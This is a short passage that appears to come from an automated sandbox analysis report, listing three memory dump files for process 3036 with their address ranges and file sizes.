                                  • memory/3036-192-0x000007FEF5790000-0x000007FEF617C000-memory.dmp
                                    Filesize

                                    9.9MB

                                  • memory/3036-193-0x0000000000C80000-0x0000000000D46000-memory.dmp
                                    Filesize

                                    792KB

                                  • memory/3036-232-0x000000001B310000-0x000000001B312000-memory.dmp
                                    Filesize

                                    8KB